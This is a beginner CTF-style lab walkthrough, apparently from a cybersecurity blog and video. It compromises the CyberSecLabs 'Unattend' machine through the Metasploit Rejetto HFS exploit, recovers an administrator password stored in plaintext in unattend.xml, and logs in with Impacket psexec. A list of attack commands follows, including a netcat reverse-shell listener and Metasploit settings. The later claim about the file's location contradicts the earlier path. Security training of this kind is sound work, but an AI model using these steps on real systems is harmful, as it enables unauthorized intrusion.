We demonstrated how to do privilege escalation on windows after grabbing plain text credentials in XML files. We used a lab machine from cyberseclabs unattend for this demo.

Machine Name: Unattend

Difficulty: Beginner

Skills Learned

  • Windows Privilege Escalation
  • Unattend XML plain text credentials

Initial Enumeration

I started with an Nmap scan to see what ports were open. I found HTTP on port 80 and SMB on ports 135, 139, and 445. I decided to check out the HTTP port first to save time. When I accessed the web page, I found a forum-like interface running “Rejetto HTTP File Server.”

Exploitation Attempts

My next step was to find exploits for the “Rejetto HTTP File Server.” I used searchsploit and found several potential exploits. One of them was a remote code execution vulnerability caused by a regex flaw in the file parser.

I first tried a manual exploit, but it required me to log in, and I didn’t have the credentials. I tried some common default logins like “admin/admin” and “root/password,” but none of them worked.

Then, I found another Python-based remote command execution exploit. I configured it with the target IP and port, and set up a Netcat listener on my machine. Even after several attempts, the exploit didn’t give me a reverse shell. It seemed unreliable.

Since the manual exploits weren’t working and I wanted to save time, I decided to use Metasploit. I selected the exploit/windows/http/rejetto_hfs_exec module, set the target’s IP address, and ran the exploit. This time, it worked, and I got a Meterpreter session on the machine!

Privilege Escalation

The machine’s name, “Unattended,” gave me a clue about how to escalate my privileges. I knew that Windows systems can have an unattended.xml file for automatic installations, and sometimes these files store user credentials in plain text.

I navigated to C:\Windows\Panther and found the unattend.xml file. I opened it and, just as I suspected, I found the administrator’s password!

Gaining System Access

With the administrator’s credentials in hand, I used psexec.py from Impacket to log into the Windows system via SMB. I ran the script with the administrator’s username, the password I found, and the target’s IP address.

Success! I got a command prompt with administrator privileges. The misconfigured unattend.xml file was the key to taking full control of this machine.

Technical Commands

Here are some of the commands I used in the video:

  • Nmap: nmap -sV -sC <IP Address>
  • Searchsploit: sudo searchsploit -w <Application Name>
  • Netcat: nc -lvnp <Port Number>
  • Python Exploit: python3 <Exploit Script Name> <Target IP> <Target Port>
  • Metasploit:
    • msfconsole
    • search exploit <Application Name>
    • use <Exploit Path>
    • show options
    • set RHOSTS <Target IP>
    • set LHOST <Attacker IP>
    • set LPORT <Listening Port>
    • run or exploit
  • Shell Commands:
    • cd <Directory>
    • dir
    • type <File Name>
  • PSExec: python3 /usr/share/doc/python3-impacket/examples/psexec.py <Username>:<Password>@<Target IP>

Video Highlights & Walkthrough

In this scenario, we leveraged XML configuration files, an example is unattend.xml, to obtain privilege on the Windows system as the SYSTEM user.  Usually these configuration files are located under C:\Windows\User\Unattend.xml and can be viewed after gaining a foothold on the target machine.

First foothold access can be obtained by searching with “Rejetto” using Metasploit and using windows/http/rejetto_hfs_exec.

, , , , ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles